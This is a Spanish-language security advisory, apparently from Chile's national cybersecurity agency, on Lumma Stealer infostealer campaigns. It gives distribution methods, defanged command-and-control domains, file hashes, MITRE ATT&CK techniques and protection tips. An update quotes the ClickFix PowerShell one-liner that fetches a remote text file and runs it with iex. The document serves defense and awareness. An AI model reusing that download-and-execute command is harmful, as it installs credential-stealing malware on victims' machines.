Campañas activas de infostealers - Comunicado
CND24-00124En las ultimas semanas, se ha observado un incremento significativo en las campañas de distribución del malware Lumma Stealer. Este malware está diseñado para el robo de información personal de las víctimas, esto incluye datos bancarios y archivos almacenados en los sistemas infectados.
Este aumento representa una amenaza critica, particularmente por su distribución ya que puede ser desde correos tipo phishing, sitios web de transmisiones o por clickfix, lo que significa que el mismo usuario es engañado para infectar su sistema.

Cuando vemos el código fuente de la falsa verificación podemos observar comandos de powershell.

Comando y control de Lumma Stealer
https://drawwyobstacw[.]sbs
https://condifendteu[.]sbs
https://ehticsprocw[.]sbs
https://vennurviot[.]sbs
https://resinedyw[.]sbs
https://enlargkiw[.]sbs
https://allocatinow[.]sbs
https://mathcucom[.]sbs
Verificación de conectividad
https://steamcommunity[.]com/profiles/76561199724331900
Desde la Agencia Nacional de Ciberseguridad (ANCI) te informamos lo siguiente:

Existe una amenaza creciente relacionada con el robo de información confidencial mediante programas maliciosos llamados "infostealers". Un infostealer es un malware que, luego de infectar un computador, toma información sensible que encuentra en ese computador y la envía a los atacantes. Esto incluye contraseñas, datos bancarios, y cualquier otra información que se almacene en su navegador o aplicaciones.
Queremos advertir sobre un infostealer específico que ha estado más activo los últimos días: Lumma. Lumma es un tipo de infostealer muy peligroso. Este programa malicioso puede:
- Robar contraseñas y datos de acceso.
- Capturar información guardada en navegadores y aplicaciones de contraseñas.
- Enviar esta información a delincuentes sin que te des cuenta.
Descripción breve de Lumma
Lumma es un malware sofisticado que se instala en tu dispositivo sin lo notes, generalmente a través de correos electrónicos falsos o descargas de programas no confiables. Una vez instalado, Lumma busca y roba información sensible como contraseñas y datos bancarios, y luego envía esta información a criminales que pueden usarla para acceder a sus cuentas y robar su dinero o información personal.
¿Cómo protegerse?
Para protegerse de estos programas maliciosos, el CSIRT recomienda lo siguiente:
- No instales aplicaciones que bajes directamente de Internet: Revísalos primero a través de un antivirus.
- Mantén tu software actualizado: Asegúrate de que tu computadora, aplicaciones y programas de seguridad estén siempre actualizados. Las actualizaciones incluyen parches de seguridad que ayudan a proteger tus dispositivos.
- Usa un buen antivirus: Instala un programa antivirus confiable y manténlo actualizado. Realice análisis regulares para buscar y eliminar posibles amenazas.
- La verificación en dos pasos (2FA): Activa la verificación en dos pasos en tus cuentas. Esto agrega una capa adicional de seguridad, ya que si alguien intenta entrar a tu cuenta con tu nombre de usuario y clave, necesitará además otro método de verificación, como un código en tu teléfono.
- Capacitación y concienciación: Infórmate y educa a tus empleados o familiares sobre los riesgos del malware. Enseña a reconocer correos electrónicos o mensajes sospechosos que podrían ser intentos de robo de información (phishing).
Indicadores de Compromiso
Tipo | Valor | Comentario |
---|---|---|
SHA256 | 024abe2084370d2c946f7a98b26149fc77224a30400a3f7e253075318172f6d9 | softwarevisiotoday_update2.exe |
SHA256 | 0408c89803285bf3084ab770a91b2212ef78ff721dbfc3c30c8ac632e68b16fc | Tuataragames Contract for YouTube Partners.pdf.exe |
SHA256 | 0a5ea83c4ae868bacfac156039b2cfd713d61c15971a19b06447cf618bc24bf2 | softwarevisiobox_update4.exe |
SHA256 | 1f64bc9469a33c77561e22beea18d9bbdd343dae89bc6f02bc85e24873d93f4e | bfsvc.exe |
SHA256 | b748181035fabd4e717bb4d8a5b86343758864353c705b386e111036280905a1 | Solution.exe |
MITRE ATT&CK | T1012 | Registro de consultas |
MITRE ATT&CK | T1018 | Descubrimiento remoto del sistema |
MITRE ATT&CK | T1027 | Archivos o información ofuscados |
MITRE ATT&CK | T1027. 002 | Software empaquetado |
MITRE ATT&CK | T1033 | Descubrimiento del propietario/usuario del sistema |
MITRE ATT&CK | T1036 | Enmascaramiento |
MITRE ATT&CK | T1055 | Inyección de procesos |
MITRE ATT&CK | T1056 | Captura de entradas |
MITRE ATT&CK | T1057 | Descubrimiento de procesos |
MITRE ATT&CK | T1059 | Intérprete de comandos y scripts |
MITRE ATT&CK | T1070. 006 | Timestomp |
MITRE ATT&CK | T1071 | Protocolo de la capa de aplicación |
MITRE ATT&CK | T1082 | Descubrimiento de información del sistema |
MITRE ATT&CK | T1083 | Descubrimiento de archivos y directorios |
MITRE ATT&CK | T1087 | Descubrimiento de cuentas |
MITRE ATT&CK | T1095 | Protocolo de capa no aplicativa |
MITRE ATT&CK | T1106 | API nativa |
MITRE ATT&CK | T1115 | Datos del portapapeles |
MITRE ATT&CK | T1129 | Módulos compartidos |
MITRE ATT&CK | T1140 | Desofuscar/Decodificar archivos o información |
MITRE ATT&CK | T1497 | Evasión de virtualización/Sandbox |
MITRE ATT&CK | T1518. 001 | Descubrimiento de software de seguridad |
MITRE ATT&CK | T1562. 001 | Desactivar o modificación de herramientas |
MITRE ATT&CK | T1573 | Canal cifrado |
Versiones Afectadas
Producto | Versiones |
---|---|
Lumma Stealer |
|
Actualizaciones
Fecha | Actualización |
---|---|
14 de octubre de 2024 a las 11:28 |
En las ultimas semanas, se ha observado un incremento significativo en las campañas de distribución del malware Lumma Stealer. Este malware está diseñado para el robo de información personal de las víctimas, esto incluye datos bancarios y archivos almacenados en los sistemas infectados. Este aumento representa una amenaza critica, particularmente por su distribución ya que puede ser desde correos tipo phishing, sitios web de transmisiones o por clickfix, lo que significa que el mismo usuario es engañado para infectar su sistema. ![]() Cuando vemos el código fuente de la falsa verificación podemos observar comandos de powershell. ![]() Comando y control de Lumma Stealerhttps://drawwyobstacw[.]sbs https://condifendteu[.]sbs https://ehticsprocw[.]sbs https://vennurviot[.]sbs https://resinedyw[.]sbs https://enlargkiw[.]sbs https://allocatinow[.]sbs https://mathcucom[.]sbs Verificación de conectividadhttps://steamcommunity[.]com/profiles/76561199724331900 |
4 de octubre de 2024 a las 11:09 |
Nuevos IoC de Lumma Stealer Lumma Stealer se esta distribuyendo desde sitios web de streaming con anuncios donde al usuario le dicen que oprima una combinacion de "inicio + R" donde aparecera el programa ejecutar, luego la victima pega y ejecuta la primera fase de infección. El comando a ejecutar seria el siguiente: "powershell.exe -W Hidden -command $url = 'https://myfilez.b-cdn[.]net/wn.txt'; Invoke-Web-Request -Uri $url -UseBasicParsing; $text = $response.Content; iex $text" para luego descargar un archivo .ZIP ![]()
perforatedmwqn[.]shop questionsmw[.]store soldiefieop[.]site abnomalrkmu[.]site chorusarorp[.]site treatynreit[.]site snarlypagowo[.]site mysterisop[.]site absorptioniw[.]site Comprueba si tiene conexión a internet al sitio de steam ![]() T-Compressor.exe [7261f0cedf7886083943bcc195f12f846d18f0e5c97122a0b3ec7c25c7cab765] |
8 de julio de 2024 a las 12:13 |
Modificamos las recomendaciones para hacerlas más específicas para el caso del infostealer Lumma. |